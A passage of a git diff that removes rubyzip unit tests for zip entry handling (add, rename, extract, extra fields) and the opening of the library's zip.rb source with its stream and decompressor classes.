-    fragment.slice!(12) # removed part of first cdir entry. eocd structure still complete
-    fragment.extend(IOizeString)
-    entry = ZipCentralDirectory.new
-    entry.read_from_stream(fragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-  def test_write_to_stream
-    entries = [ ZipEntry.new("file.zip", "flimse", "myComment", "somethingExtra"),
-      ZipEntry.new("file.zip", "secondEntryName"),
-      ZipEntry.new("file.zip", "lastEntry.txt", "Has a comment too") ]
-    cdir = ZipCentralDirectory.new(entries, "my zip comment")
-    File.open("cdirtest.bin", "wb") { |f| cdir.write_to_stream(f) }
-    cdirReadback = ZipCentralDirectory.new
-    File.open("cdirtest.bin", "rb") { |f| cdirReadback.read_from_stream(f) }
-    
-    assert_equal(cdir.entries.sort, cdirReadback.entries.sort)
-  end
-
-  def test_equality
-    cdir1 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "my zip comment")
-    cdir2 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "my zip comment")
-    cdir3 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "comment?")
-    cdir4 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "comment?")
-    assert_equal(cdir1, cdir1)
-    assert_equal(cdir1, cdir2)
-
-    assert(cdir1 !=  cdir3)
-    assert(cdir2 !=  cdir3)
-    assert(cdir2 !=  cdir3)
-    assert(cdir3 !=  cdir4)
-
-    assert(cdir3 !=  "hello")
-  end
-end
-
-
-class BasicZipFileTest < Test::Unit::TestCase
-  include AssertEntry
-
-  def setup
-    @zipFile = ZipFile.new(TestZipFile::TEST_ZIP2.zip_name)
-    @testEntryNameIndex=0
-  end
-
-  def test_entries
-    assert_equal(TestZipFile::TEST_ZIP2.entry_names.sort, 
-      @zipFile.entries.entries.sort.map {|e| e.name} )
-  end
-
-  def test_each
-    count = 0
-    visited = {}
-    @zipFile.each {
-      |entry|
-      assert(TestZipFile::TEST_ZIP2.entry_names.include?(entry.name))
-      assert(! visited.include?(entry.name))
-      visited[entry.name] = nil
-      count = count.succ
-    }
-    assert_equal(TestZipFile::TEST_ZIP2.entry_names.length, count)
-  end
-
-  def test_foreach
-    count = 0
-    visited = {}
-    ZipFile.foreach(TestZipFile::TEST_ZIP2.zip_name) {
-      |entry|
-      assert(TestZipFile::TEST_ZIP2.entry_names.include?(entry.name))
-      assert(! visited.include?(entry.name))
-      visited[entry.name] = nil
-      count = count.succ
-    }
-    assert_equal(TestZipFile::TEST_ZIP2.entry_names.length, count)
-  end
-
-  def test_get_input_stream
-    count = 0
-    visited = {}
-    @zipFile.each {
-      |entry|
-      assert_entry(entry.name, @zipFile.get_input_stream(entry), entry.name)
-      assert(! visited.include?(entry.name))
-      visited[entry.name] = nil
-      count = count.succ
-    }
-    assert_equal(TestZipFile::TEST_ZIP2.entry_names.length, count)
-  end
-
-  def test_get_input_streamBlock
-    fileAndEntryName = @zipFile.entries.first.name
-    @zipFile.get_input_stream(fileAndEntryName) {
-      |zis|
-      assert_entryContentsForStream(fileAndEntryName, 
-           zis, 
-           fileAndEntryName)
-    }
-  end
-end
-
-module CommonZipFileFixture 
-  include AssertEntry
-
-  EMPTY_FILENAME = "emptyZipFile.zip"
-
-  TEST_ZIP = TestZipFile::TEST_ZIP2.clone
-  TEST_ZIP.zip_name = "5entry_copy.zip"
-
-  def setup
-    File.delete(EMPTY_FILENAME) if File.exists?(EMPTY_FILENAME)
-    FileUtils.cp(TestZipFile::TEST_ZIP2.zip_name, TEST_ZIP.zip_name)
-  end
-end
-
-class ZipFileTest < Test::Unit::TestCase
-  include CommonZipFileFixture
-
-  def test_createFromScratch
-    comment  = "a short comment"
-
-    zf = ZipFile.new(EMPTY_FILENAME, ZipFile::CREATE)
-    zf.get_output_stream("myFile") { |os| os.write "myFile contains just this" }
-    zf.mkdir("dir1")
-    zf.comment = comment
-    zf.close
-
-    zfRead = ZipFile.new(EMPTY_FILENAME)
-    assert_equal(comment, zfRead.comment)
-    assert_equal(2, zfRead.entries.length)
-  end
-
-  def test_get_output_stream
-    entryCount = nil
-    ZipFile.open(TEST_ZIP.zip_name) {
-      |zf|
-      entryCount = zf.size
-      zf.get_output_stream('newEntry.txt') {
-        |os|
-        os.write "Putting stuff in newEntry.txt"
-      }
-      assert_equal(entryCount+1, zf.size)
-      assert_equal("Putting stuff in newEntry.txt", zf.read("newEntry.txt")) 
-
-      zf.get_output_stream(zf.get_entry('data/generated/empty.txt')) {
-        |os|
-        os.write "Putting stuff in data/generated/empty.txt"
-      }
-      assert_equal(entryCount+1, zf.size)
-      assert_equal("Putting stuff in data/generated/empty.txt", zf.read("data/generated/empty.txt")) 
-
-      zf.get_output_stream('entry.bin') {
-  |os|
-  os.write(File.open('data/generated/5entry.zip', 'rb').read)
-      }
-    }
-    
-    ZipFile.open(TEST_ZIP.zip_name) {
-      |zf|
-      assert_equal(entryCount+2, zf.size)
-      assert_equal("Putting stuff in newEntry.txt", zf.read("newEntry.txt")) 
-      assert_equal("Putting stuff in data/generated/empty.txt", zf.read("data/generated/empty.txt")) 
-      assert_equal(File.open('data/generated/5entry.zip', 'rb').read, zf.read("entry.bin")) 
-    }
-  end
-
-  def test_add
-    srcFile   = "data/file2.txt"
-    entryName = "newEntryName.rb" 
-    assert(File.exists?(srcFile))
-    zf = ZipFile.new(EMPTY_FILENAME, ZipFile::CREATE)
-    zf.add(entryName, srcFile)
-    zf.close
-
-    zfRead = ZipFile.new(EMPTY_FILENAME)
-    assert_equal("", zfRead.comment)
-    assert_equal(1, zfRead.entries.length)
-    assert_equal(entryName, zfRead.entries.first.name)
-    AssertEntry.assert_contents(srcFile, 
-             zfRead.get_input_stream(entryName) { |zis| zis.read })
-  end
-
-  def test_addExistingEntryName
-    assert_raise(ZipEntryExistsError) {
-      ZipFile.open(TEST_ZIP.zip_name) {
-  |zf|
-  zf.add(zf.entries.first.name, "data/file2.txt")
-      }
-    }
-  end
-
-  def test_addExistingEntryNameReplace
-    gotCalled = false
-    replacedEntry = nil
-    ZipFile.open(TEST_ZIP.zip_name) {
-      |zf|
-      replacedEntry = zf.entries.first.name
-      zf.add(replacedEntry, "data/file2.txt") { gotCalled = true; true }
-    }
-    assert(gotCalled)
-    ZipFile.open(TEST_ZIP.zip_name) {
-      |zf|
-      assert_contains(zf, replacedEntry, "data/file2.txt")
-    }
-  end
-
-  def test_addDirectory
-    ZipFile.open(TEST_ZIP.zip_name) {
-      |zf|
-      zf.add(TestFiles::EMPTY_TEST_DIR, TestFiles::EMPTY_TEST_DIR)
-    }
-    ZipFile.open(TEST_ZIP.zip_name) {
-      |zf|
-      dirEntry = zf.entries.detect { |e| e.name == TestFiles::EMPTY_TEST_DIR+"/" } 
-      assert(dirEntry.is_directory)
-    }
-  end
-
-  def test_remove
-    entryToRemove, *remainingEntries = TEST_ZIP.entry_names
-
-    FileUtils.cp(TestZipFile::TEST_ZIP2.zip_name, TEST_ZIP.zip_name)
-
-    zf = ZipFile.new(TEST_ZIP.zip_name)
-    assert(zf.entries.map { |e| e.name }.include?(entryToRemove))
-    zf.remove(entryToRemove)
-    assert(! zf.entries.map { |e| e.name }.include?(entryToRemove))
-    assert_equal(zf.entries.map {|x| x.name }.sort, remainingEntries.sort) 
-    zf.close
-
-    zfRead = ZipFile.new(TEST_ZIP.zip_name)
-    assert(! zfRead.entries.map { |e| e.name }.include?(entryToRemove))
-    assert_equal(zfRead.entries.map {|x| x.name }.sort, remainingEntries.sort) 
-    zfRead.close
-  end
-
-  def test_rename
-    entryToRename, *remainingEntries = TEST_ZIP.entry_names
-
-    zf = ZipFile.new(TEST_ZIP.zip_name)
-    assert(zf.entries.map { |e| e.name }.include?(entryToRename))
-
-    contents = zf.read(entryToRename)
-    newName = "changed entry name"
-    assert(! zf.entries.map { |e| e.name }.include?(newName))
-
-    zf.rename(entryToRename, newName)
-    assert(zf.entries.map { |e| e.name }.include?(newName))
-
-    assert_equal(contents, zf.read(newName))
-
-    zf.close
-
-    zfRead = ZipFile.new(TEST_ZIP.zip_name)
-    assert(zfRead.entries.map { |e| e.name }.include?(newName))
-    assert_equal(contents, zf.read(newName))
-    zfRead.close    
-  end
-
-  def test_renameToExistingEntry
-    oldEntries = nil
-    ZipFile.open(TEST_ZIP.zip_name) { |zf| oldEntries = zf.entries }
-
-    assert_raise(ZipEntryExistsError) {
-      ZipFile.open(TEST_ZIP.zip_name) {
-  |zf|
-  zf.rename(zf.entries[0], zf.entries[1].name)
-      }
-    }
-
-    ZipFile.open(TEST_ZIP.zip_name) { 
-      |zf| 
-      assert_equal(oldEntries.sort.map{ |e| e.name }, zf.entries.sort.map{ |e| e.name })
-    }
-  end
-
-  def test_renameToExistingEntryOverwrite
-    oldEntries = nil
-    ZipFile.open(TEST_ZIP.zip_name) { |zf| oldEntries = zf.entries }
-    
-    gotCalled = false
-    renamedEntryName = nil
-    ZipFile.open(TEST_ZIP.zip_name) {
-      |zf|
-      renamedEntryName = zf.entries[0].name
-      zf.rename(zf.entries[0], zf.entries[1].name) { gotCalled = true; true }
-    }
-
-    assert(gotCalled)
-    oldEntries.delete_if { |e| e.name == renamedEntryName }
-    ZipFile.open(TEST_ZIP.zip_name) { 
-      |zf| 
-      assert_equal(oldEntries.sort.map{ |e| e.name }, 
-        zf.entries.sort.map{ |e| e.name })
-    }
-  end
-
-  def test_renameNonEntry
-    nonEntry = "bogusEntry"
-    target_entry = "target_entryName"
-    zf = ZipFile.new(TEST_ZIP.zip_name)
-    assert(! zf.entries.include?(nonEntry))
-    assert_raise(Errno::ENOENT) {
-      zf.rename(nonEntry, target_entry)
-    }
-    zf.commit
-    assert(! zf.entries.include?(target_entry))
-  ensure
-    zf.close
-  end
-
-  def test_renameEntryToExistingEntry
-    entry1, entry2, *remaining = TEST_ZIP.entry_names
-    zf = ZipFile.new(TEST_ZIP.zip_name)
-    assert_raise(ZipEntryExistsError) {
-      zf.rename(entry1, entry2)
-    }
-  ensure 
-    zf.close
-  end
-
-  def test_replace
-    entryToReplace = TEST_ZIP.entry_names[2]
-    newEntrySrcFilename = "data/file2.txt" 
-    zf = ZipFile.new(TEST_ZIP.zip_name)
-    zf.replace(entryToReplace, newEntrySrcFilename)
-    
-    zf.close
-    zfRead = ZipFile.new(TEST_ZIP.zip_name)
-    AssertEntry::assert_contents(newEntrySrcFilename, 
-        zfRead.get_input_stream(entryToReplace) { |is| is.read })
-    AssertEntry::assert_contents(TEST_ZIP.entry_names[0], 
-        zfRead.get_input_stream(TEST_ZIP.entry_names[0]) { |is| is.read })
-    AssertEntry::assert_contents(TEST_ZIP.entry_names[1], 
-        zfRead.get_input_stream(TEST_ZIP.entry_names[1]) { |is| is.read })
-    AssertEntry::assert_contents(TEST_ZIP.entry_names[3], 
-        zfRead.get_input_stream(TEST_ZIP.entry_names[3]) { |is| is.read })
-    zfRead.close    
-  end
-
-  def test_replaceNonEntry
-    entryToReplace = "nonExistingEntryname"
-    ZipFile.open(TEST_ZIP.zip_name) {
-      |zf|
-      assert_raise(Errno::ENOENT) {
-  zf.replace(entryToReplace, "data/file2.txt")
-      }
-    }
-  end
-
-  def test_commit
-    newName = "renamedFirst"
-    zf = ZipFile.new(TEST_ZIP.zip_name)
-    oldName = zf.entries.first
-    zf.rename(oldName, newName)
-    zf.commit
-
-    zfRead = ZipFile.new(TEST_ZIP.zip_name)
-    assert(zfRead.entries.detect { |e| e.name == newName } != nil)
-    assert(zfRead.entries.detect { |e| e.name == oldName } == nil)
-    zfRead.close
-
-    zf.close
-  end
-
-  # This test tests that after commit, you
-  # can delete the file you used to add the entry to the zip file
-  # with
-  def test_commitUseZipEntry
-    FileUtils.cp(TestFiles::RANDOM_ASCII_FILE1, "okToDelete.txt")
-    zf = ZipFile.open(TEST_ZIP.zip_name)
-    zf.add("okToDelete.txt", "okToDelete.txt")
-    assert_contains(zf, "okToDelete.txt")
-    zf.commit
-    File.rename("okToDelete.txt", "okToDeleteMoved.txt")
-    assert_contains(zf, "okToDelete.txt", "okToDeleteMoved.txt")
-  end
-
-#  def test_close
-#    zf = ZipFile.new(TEST_ZIP.zip_name)
-#    zf.close
-#    assert_raise(IOError) {
-#      zf.extract(TEST_ZIP.entry_names.first, "hullubullu")
-#    }
-#  end
-
-  def test_compound1
-    renamedName = "renamedName"
-    originalEntries = []
-    begin
-      zf = ZipFile.new(TEST_ZIP.zip_name)
-      originalEntries = zf.entries.dup
-
-      assert_not_contains(zf, TestFiles::RANDOM_ASCII_FILE1)
-      zf.add(TestFiles::RANDOM_ASCII_FILE1, 
-       TestFiles::RANDOM_ASCII_FILE1)
-      assert_contains(zf, TestFiles::RANDOM_ASCII_FILE1)
-
-      zf.rename(zf.entries[0], renamedName)
-      assert_contains(zf, renamedName)
-
-      TestFiles::BINARY_TEST_FILES.each {
-  |filename|
-  zf.add(filename, filename)
-  assert_contains(zf, filename)
-      }
-
-      assert_contains(zf, originalEntries.last.to_s)
-      zf.remove(originalEntries.last.to_s)
-      assert_not_contains(zf, originalEntries.last.to_s)
-      
-    ensure
-      zf.close
-    end
-    begin
-      zfRead = ZipFile.new(TEST_ZIP.zip_name)
-      assert_contains(zfRead, TestFiles::RANDOM_ASCII_FILE1)
-      assert_contains(zfRead, renamedName)
-      TestFiles::BINARY_TEST_FILES.each {
-  |filename|
-  assert_contains(zfRead, filename)
-      }
-      assert_not_contains(zfRead, originalEntries.last.to_s)
-    ensure
-      zfRead.close
-    end
-  end
-
-  def test_compound2
-    begin
-      zf = ZipFile.new(TEST_ZIP.zip_name)
-      originalEntries = zf.entries.dup
-      
-      originalEntries.each {
-  |entry|
-  zf.remove(entry)
-  assert_not_contains(zf, entry)
-      }
-      assert(zf.entries.empty?)
-      
-      TestFiles::ASCII_TEST_FILES.each {
-  |filename|
-  zf.add(filename, filename)
-  assert_contains(zf, filename)
-      }
-      assert_equal(zf.entries.sort.map { |e| e.name }, TestFiles::ASCII_TEST_FILES)
-      
-      zf.rename(TestFiles::ASCII_TEST_FILES[0], "newName")
-      assert_not_contains(zf, TestFiles::ASCII_TEST_FILES[0])
-      assert_contains(zf, "newName")
-    ensure
-      zf.close
-    end
-    begin
-      zfRead = ZipFile.new(TEST_ZIP.zip_name)
-      asciiTestFiles = TestFiles::ASCII_TEST_FILES.dup
-      asciiTestFiles.shift
-      asciiTestFiles.each {
-  |filename|
-  assert_contains(zf, filename)
-      }
-
-      assert_contains(zf, "newName")
-    ensure
-      zfRead.close
-    end
-  end
-
-  private
-  def assert_contains(zf, entryName, filename = entryName)
-    assert(zf.entries.detect { |e| e.name == entryName} != nil, "entry #{entryName} not in #{zf.entries.join(', ')} in zip file #{zf}")
-    assert_entryContents(zf, entryName, filename) if File.exists?(filename)
-  end
-  
-  def assert_not_contains(zf, entryName)
-    assert(zf.entries.detect { |e| e.name == entryName} == nil, "entry #{entryName} in #{zf.entries.join(', ')} in zip file #{zf}")
-  end
-end
-
-class ZipFileExtractTest < Test::Unit::TestCase
-  include CommonZipFileFixture
-  EXTRACTED_FILENAME = "extEntry"
-  ENTRY_TO_EXTRACT, *REMAINING_ENTRIES = TEST_ZIP.entry_names.reverse
-
-  def setup
-    super
-    File.delete(EXTRACTED_FILENAME) if File.exists?(EXTRACTED_FILENAME)
-  end
-
-  def test_extract
-    ZipFile.open(TEST_ZIP.zip_name) {
-      |zf|
-      zf.extract(ENTRY_TO_EXTRACT, EXTRACTED_FILENAME)
-      
-      assert(File.exists?(EXTRACTED_FILENAME))
-      AssertEntry::assert_contents(EXTRACTED_FILENAME, 
-          zf.get_input_stream(ENTRY_TO_EXTRACT) { |is| is.read })
-
-
-      File::unlink(EXTRACTED_FILENAME)
-
-      entry = zf.get_entry(ENTRY_TO_EXTRACT)
-      entry.extract(EXTRACTED_FILENAME)
-
-      assert(File.exists?(EXTRACTED_FILENAME))
-      AssertEntry::assert_contents(EXTRACTED_FILENAME, 
-          entry.get_input_stream() { |is| is.read })
-
-    }
-  end
-
-  def test_extractExists
-    writtenText = "written text"
-    File.open(EXTRACTED_FILENAME, "w") { |f| f.write(writtenText) }
-
-    assert_raise(ZipDestinationFileExistsError) {
-      ZipFile.open(TEST_ZIP.zip_name) { 
-  |zf| 
-  zf.extract(zf.entries.first, EXTRACTED_FILENAME) 
-      }
-    }
-    File.open(EXTRACTED_FILENAME, "r") {
-      |f|
-      assert_equal(writtenText, f.read)
-    }
-  end
-
-  def test_extractExistsOverwrite
-    writtenText = "written text"
-    File.open(EXTRACTED_FILENAME, "w") { |f| f.write(writtenText) }
-
-    gotCalledCorrectly = false
-    ZipFile.open(TEST_ZIP.zip_name) {
-      |zf|
-      zf.extract(zf.entries.first, EXTRACTED_FILENAME) { 
-        |entry, extractLoc| 
-        gotCalledCorrectly = zf.entries.first == entry && 
-                                    extractLoc == EXTRACTED_FILENAME
-        true 
-        }
-    }
-
-    assert(gotCalledCorrectly)
-    File.open(EXTRACTED_FILENAME, "r") {
-      |f|
-      assert(writtenText != f.read)
-    }
-  end
-
-  def test_extractNonEntry
-    zf = ZipFile.new(TEST_ZIP.zip_name)
-    assert_raise(Errno::ENOENT) { zf.extract("nonExistingEntry", "nonExistingEntry") }
-  ensure
-    zf.close if zf
-  end
-
-  def test_extractNonEntry2
-    outFile = "outfile"
-    assert_raise(Errno::ENOENT) {
-      zf = ZipFile.new(TEST_ZIP.zip_name)
-      nonEntry = "hotdog-diddelidoo"
-      assert(! zf.entries.include?(nonEntry))
-      zf.extract(nonEntry, outFile)
-      zf.close
-    }
-    assert(! File.exists?(outFile))
-  end
-
-end
-
-class ZipFileExtractDirectoryTest < Test::Unit::TestCase
-  include CommonZipFileFixture
-  TEST_OUT_NAME = "emptyOutDir"
-
-  def open_zip(&aProc)
-    assert(aProc != nil)
-    ZipFile.open(TestZipFile::TEST_ZIP4.zip_name, &aProc)
-  end
-
-  def extract_test_dir(&aProc)
-    open_zip {
-      |zf|
-      zf.extract(TestFiles::EMPTY_TEST_DIR, TEST_OUT_NAME, &aProc)
-    }
-  end
-
-  def setup
-    super
-
-    Dir.rmdir(TEST_OUT_NAME)   if File.directory? TEST_OUT_NAME
-    File.delete(TEST_OUT_NAME) if File.exists?    TEST_OUT_NAME
-  end
-    
-  def test_extractDirectory
-    extract_test_dir
-    assert(File.directory?(TEST_OUT_NAME))
-  end
-  
-  def test_extractDirectoryExistsAsDir
-    Dir.mkdir TEST_OUT_NAME
-    extract_test_dir
-    assert(File.directory?(TEST_OUT_NAME))
-  end
-
-  def test_extractDirectoryExistsAsFile
-    File.open(TEST_OUT_NAME, "w") { |f| f.puts "something" }
-    assert_raise(ZipDestinationFileExistsError) { extract_test_dir }
-  end
-
-  def test_extractDirectoryExistsAsFileOverwrite
-    File.open(TEST_OUT_NAME, "w") { |f| f.puts "something" }
-    gotCalled = false
-    extract_test_dir { 
-      |entry, destPath| 
-      gotCalled = true
-      assert_equal(TEST_OUT_NAME, destPath)
-      assert(entry.is_directory)
-      true
-    }
-    assert(gotCalled)
-    assert(File.directory?(TEST_OUT_NAME))
-  end
-end
-
-class ZipExtraFieldTest < Test::Unit::TestCase
-  def test_new
-    extra_pure    = ZipExtraField.new("")
-    extra_withstr = ZipExtraField.new("foo")
-    assert_instance_of(ZipExtraField, extra_pure)
-    assert_instance_of(ZipExtraField, extra_withstr)
-  end
-
-  def test_unknownfield
-    extra = ZipExtraField.new("foo")
-    assert_equal(extra["Unknown"], "foo")
-    extra.merge("a")
-    assert_equal(extra["Unknown"], "fooa")
-    extra.merge("barbaz")
-    assert_equal(extra.to_s, "fooabarbaz")
-  end
-
-
-  def test_merge
-    str = "UT\x5\0\x3\250$\r@Ux\0\0"
-    extra1 = ZipExtraField.new("")
-    extra2 = ZipExtraField.new(str)
-    assert(! extra1.member?("UniversalTime"))
-    assert(extra2.member?("UniversalTime"))
-    extra1.merge(str)
-    assert_equal(extra1["UniversalTime"].mtime, extra2["UniversalTime"].mtime)
-  end
-
-  def test_length
-    str = "UT\x5\0\x3\250$\r@Ux\0\0Te\0\0testit"
-    extra = ZipExtraField.new(str)
-    assert_equal(extra.local_length, extra.to_local_bin.length)
-    assert_equal(extra.c_dir_length, extra.to_c_dir_bin.length)
-    extra.merge("foo")
-    assert_equal(extra.local_length, extra.to_local_bin.length)
-    assert_equal(extra.c_dir_length, extra.to_c_dir_bin.length)
-  end
-
-
-  def test_to_s
-    str = "UT\x5\0\x3\250$\r@Ux\0\0Te\0\0testit"
-    extra = ZipExtraField.new(str)
-    assert_instance_of(String, extra.to_s)
-
-    s = extra.to_s
-    extra.merge("foo")
-    assert_equal(s.length + 3, extra.to_s.length)
-  end
-
-  def test_equality
-    str = "UT\x5\0\x3\250$\r@"
-    extra1 = ZipExtraField.new(str)
-    extra2 = ZipExtraField.new(str)
-    extra3 = ZipExtraField.new(str)
-    assert_equal(extra1, extra2)
-   
-    extra2["UniversalTime"].mtime = Time.now
-    assert(extra1 != extra2)
-
-    extra3.create("IUnix")
-    assert(extra1 != extra3)
-
-    extra1.create("IUnix")
-    assert_equal(extra1, extra3)
-  end
-
-end
-
-# Copyright (C) 2002-2005 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
diff --git a/lib/zip/zip.rb b/lib/zip/zip.rb
deleted file mode 100644
index e5d150de96..0000000000
--- a/lib/zip/zip.rb
+++ /dev/null
@@ -1,1900 +0,0 @@
-# encoding: ASCII-8BIT
-require 'delegate'
-
-begin 
-  require 'iconv'
-rescue ::LoadError
-end
-
-require 'singleton'
-require 'tempfile'
-require 'fileutils'
-require 'stringio'
-require 'zlib'
-require 'zip/stdrubyext'
-require 'zip/ioextras'
-
-if Tempfile.superclass == SimpleDelegator
-  require 'zip/tempfile_bugfixed'
-  Tempfile = BugFix::Tempfile
-end
-
-module Zlib  #:nodoc:all
-  if ! const_defined? :MAX_WBITS
-    MAX_WBITS = Zlib::Deflate.MAX_WBITS
-  end
-end
-
-module Zip
-
-  VERSION = '0.9.4'
-
-  RUBY_MINOR_VERSION = RUBY_VERSION.split(".")[1].to_i
-
-  RUNNING_ON_WINDOWS = /mswin32|cygwin|mingw|bccwin/ =~ RUBY_PLATFORM
-
-  # Ruby 1.7.x compatibility
-  # In ruby 1.6.x and 1.8.0 reading from an empty stream returns 
-  # an empty string the first time and then nil.
-  #  not so in 1.7.x
-  EMPTY_FILE_RETURNS_EMPTY_STRING_FIRST = RUBY_MINOR_VERSION != 7
-
-  # ZipInputStream is the basic class for reading zip entries in a 
-  # zip file. It is possible to create a ZipInputStream object directly, 
-  # passing the zip file name to the constructor, but more often than not 
-  # the ZipInputStream will be obtained from a ZipFile (perhaps using the 
-  # ZipFileSystem interface) object for a particular entry in the zip 
-  # archive.
-  #
-  # A ZipInputStream inherits IOExtras::AbstractInputStream in order
-  # to provide an IO-like interface for reading from a single zip 
-  # entry. Beyond methods for mimicking an IO-object it contains 
-  # the method get_next_entry for iterating through the entries of 
-  # an archive. get_next_entry returns a ZipEntry object that describes
-  # the zip entry the ZipInputStream is currently reading from.
-  #
-  # Example that creates a zip archive with ZipOutputStream and reads it 
-  # back again with a ZipInputStream.
-  #
-  #   require 'zip/zip'
-  #   
-  #   Zip::ZipOutputStream::open("my.zip") { 
-  #     |io|
-  #   
-  #     io.put_next_entry("first_entry.txt")
-  #     io.write "Hello world!"
-  #   
-  #     io.put_next_entry("adir/first_entry.txt")
-  #     io.write "Hello again!"
-  #   }
-  #
-  #   
-  #   Zip::ZipInputStream::open("my.zip") {
-  #     |io|
-  #   
-  #     while (entry = io.get_next_entry)
-  #       puts "Contents of #{entry.name}: '#{io.read}'"
-  #     end
-  #   }
-  #
-  # java.util.zip.ZipInputStream is the original inspiration for this 
-  # class.
-
-  class ZipInputStream 
-    include IOExtras::AbstractInputStream
-
-    # Opens the indicated zip file. An exception is thrown
-    # if the specified offset in the specified filename is
-    # not a local zip entry header.
-    def initialize(filename, offset = 0)
-      super()
-      @archiveIO = File.open(filename, "rb")
-      @archiveIO.seek(offset, IO::SEEK_SET)
-      @decompressor = NullDecompressor.instance
-      @currentEntry = nil
-    end
-    
-    def close
-      @archiveIO.close
-    end
-
-    # Same as #initialize but if a block is passed the opened
-    # stream is passed to the block and closed when the block
-    # returns.    
-    def ZipInputStream.open(filename)
-      return new(filename) unless block_given?
-      
-      zio = new(filename)
-      yield zio
-    ensure
-      zio.close if zio
-    end
-
-    # Returns a ZipEntry object. It is necessary to call this
-    # method on a newly created ZipInputStream before reading from 
-    # the first entry in the archive. Returns nil when there are 
-    # no more entries.
-
-    def get_next_entry
-      @archiveIO.seek(@currentEntry.next_header_offset, 
-                      IO::SEEK_SET) if @currentEntry
-      open_entry
-    end
-
-    # Rewinds the stream to the beginning of the current entry
-    def rewind
-      return if @currentEntry.nil?
-      @lineno = 0
-      @archiveIO.seek(@currentEntry.localHeaderOffset, 
-          IO::SEEK_SET)
-      open_entry
-    end
-
-    # Modeled after IO.sysread
-    def sysread(numberOfBytes = nil, buf = nil)
-      @decompressor.sysread(numberOfBytes, buf)
-    end
-
-    def eof
-      @outputBuffer.empty? && @decompressor.eof
-    end
-    alias :eof? :eof
-
-    protected
-
-    def open_entry
-      @currentEntry = ZipEntry.read_local_entry(@archiveIO)
-      if (@currentEntry == nil) 
-        @decompressor = NullDecompressor.instance
-      elsif @currentEntry.compression_method == ZipEntry::STORED
-        @decompressor = PassThruDecompressor.new(@archiveIO, @currentEntry.size)
-      elsif @currentEntry.compression_method == ZipEntry::DEFLATED
-        @decompressor = Inflater.new(@archiveIO)
-      else
-        raise ZipCompressionMethodError, "Unsupported compression method #{@currentEntry.compression_method}"
-      end
-      flush
-      return @currentEntry
-    end
-
-    def produce_input
-      @decompressor.produce_input
-    end
-
-    def input_finished?
-      @decompressor.input_finished?
-    end
-  end
-  
-  
-  
-  class Decompressor  #:nodoc:all
-    CHUNK_SIZE=32768
-    def initialize(inputStream)
-      super()
-      @inputStream=inputStream
-    end
-  end
-  
-  class Inflater < Decompressor  #:nodoc:all
-    def initialize(inputStream)
-      super
-      @zlibInflater = Zlib::Inflate.new(-Zlib::MAX_WBITS)
-      @outputBuffer=""
-      @hasReturnedEmptyString = ! EMPTY_FILE_RETURNS_EMPTY_STRING_FIRST
-    end
-    
-    def sysread(numberOfBytes = nil, buf = nil)
-      readEverything = (numberOfBytes == nil)
-      while (readEverything || @outputBuffer.length < numberOfBytes)
-        break if internal_input_finished?
-        @outputBuffer << internal_produce_input(buf)
-      end
-      return value_when_finished if @outputBuffer.length==0 && input_finished?
-      endIndex= numberOfBytes==nil ? @outputBuffer.length : numberOfBytes
-      return @outputBuffer.slice!(0...endIndex)
-    end
-    
-    def produce_input
-      if (@outputBuffer.empty?)
-        return internal_produce_input
-      else
-        return @outputBuffer.slice!(0...(@outputBuffer.length))
-      end
-    end
-
-    # to be used with produce_input, not read (as read may still have more data cached)
-    # is data cached anywhere other than @outputBuffer?  the comment above may be wrong
-    def input_finished?
-      @outputBuffer.empty? && internal_input_finished?
-    end
-    alias :eof :input_finished?
-    alias :eof? :input_finished?
-
-    private
-
-    def internal_produce_input(buf = nil)
-      retried = 0
-      begin
-        @zlibInflater.inflate(@inputStream.read(Decompressor::CHUNK_SIZE, buf))
-      rescue Zlib::BufError
-        raise if (retried >= 5) # how many times should we retry?
-        retried += 1
-        retry
-      end
-    end
-
-    def internal_input_finished?
-      @zlibInflater.finished?
-    end
-
-    # TODO: Specialize to handle different behaviour in ruby > 1.7.0 ?
-    def value_when_finished   # mimic behaviour of ruby File object.
-      return nil if @hasReturnedEmptyString
-      @hasReturnedEmptyString=true
-      return ""
-    end
-  end
-  
-  class PassThruDecompressor < Decompressor  #:nodoc:all
-    def initialize(inputStream, charsToRead)
-      super inputStream
-      @charsToRead = charsToRead
-      @readSoFar = 0
-      @hasReturnedEmptyString = ! EMPTY_FILE_RETURNS_EMPTY_STRING_FIRST
-    end
-    
-    # TODO: Specialize to handle different behaviour in ruby > 1.7.0 ?
-    def sysread(numberOfBytes = nil, buf = nil)
-      if input_finished?
-        hasReturnedEmptyStringVal=@hasReturnedEmptyString
-        @hasReturnedEmptyString=true
-        return "" unless hasReturnedEmptyStringVal
-        return nil
-      end
-      
-      if (numberOfBytes == nil || @readSoFar+numberOfBytes > @charsToRead)
-        numberOfBytes = @charsToRead-@readSoFar
-      end
-      @readSoFar += numberOfBytes
-      @inputStream.read(numberOfBytes, buf)
-    end
-    
-    def produce_input
-      sysread(Decompressor::CHUNK_SIZE)
-    end
-    
-    def input_finished?
-      (@readSoFar >= @charsToRead)
-    end
-    alias :eof :input_finished?
-    alias :eof? :input_finished?
-  end
-  
-  class NullDecompressor  #:nodoc:all
-    include Singleton
-    def sysread(numberOfBytes = nil, buf = nil)
-      nil
-    end
-    
-    def produce_input
-      nil
-    end
-    
-    def input_finished?
-      true
-    end
-
-    def eof
-      true
-    end
-    alias :eof? :eof
-  end
-  
-  class NullInputStream < NullDecompressor  #:nodoc:all
-    include IOExtras::AbstractInputStream
-  end
-  
-  class ZipEntry
-    STORED = 0
-    DEFLATED = 8
-
-    FSTYPE_FAT = 0
-    FSTYPE_AMIGA = 1
-    FSTYPE_VMS = 2
-    FSTYPE_UNIX = 3
